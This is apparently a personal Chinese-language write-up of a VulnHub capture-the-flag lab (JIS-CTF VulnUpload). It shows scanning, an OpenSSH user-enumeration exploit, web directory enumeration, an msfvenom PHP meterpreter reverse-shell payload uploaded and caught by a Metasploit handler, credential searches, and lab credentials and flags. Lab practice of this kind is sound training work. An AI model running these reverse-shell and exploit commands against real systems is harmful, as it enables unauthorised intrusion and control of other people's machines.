JIS-CTF_VulnUpload靶机

仅供个人娱乐

靶机信息

下载地址：https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

一、网卡设置

设置为NAT模式，

使用vi去修改/etc/network/interface

修改保存重启，启动网卡username 3: technawi   password : 3vilH@ksor

二、主机探测

nmap -sn 192.168.47.0/24

nmap -n -vv -T5 -sn 192.168.47.0/24 | grep -B 1 'Host is up'

三、端口扫描

JIS 在 22 端口开启了 SSH（OpenSSH 7.2p2）、80 端口开启 HTTP（Apache httpd 2.4.18）等两个服务。另外，操作系统为 ubuntu。这三个信息将成为下个阶段的主要攻击面。

cd /usr/share/exploitdb/exploits/linux/remote/

python 40136.py -U '/root/user.txt' -e 192.168.47.137

searchsploit openssh

有两个漏洞，依次为本地提权的漏洞、远程命令执行漏洞。

对前者而言，当前没用任何据点（如webshell），还谈不上提权操作，当前只能先放放，后续可能用的上；

对后者来说，利用条件非常严苛，攻击者必须拿到 forwardedagent-socket 的控制权，而且目标必须 SSH 登录攻击者所控制 forwarded agent-socket的那台机器，才可能让目标加载指定 *.so，实现远程命令执行。

漏洞为漏洞内存泄漏的漏洞

查看web页面

首先查看源码

dirb http://192.168.47.137

通过 engagement tools – discover content，启用子目录枚举功能

这里已经知道了后端语言是php，所以就只枚举php文件

爬取网站

在sitemap搜索一下flag

The 1st flag is : {8734509128730458630012095}

The 2nd flag is : {7412574125871236547895214}

username : admin

password : 3v1l_H@ck3r

上传文件

我们爬到的uploads跟uploaded_files文件夹，去尝试访问

msfvenom --payload php/meterpreter/reverse_tcp LHOST=192.168.47.128 LPORT=4444 --format raw --out ./php.php

上传木马

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload /php/meterpreter/reverse_tcp

se[-] The value specified for payload is not valid.

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set Lhost 192.168.47.128

Lhost => 192.168.47.128

msf5 exploit(multi/handler) > set LPORT 4444

LPORT => 4444

msf5 exploit(multi/handler) > run

信息收集

发现了在technawi的用户目录下有.sudo_as_admin_successful文件，所以我们只要拥有technawi用户，就有root权限

再去找找文件中有没technawi

grep -ri --exclude-dir=proc/ 'technawi' / 2> /dev/null

ssh登录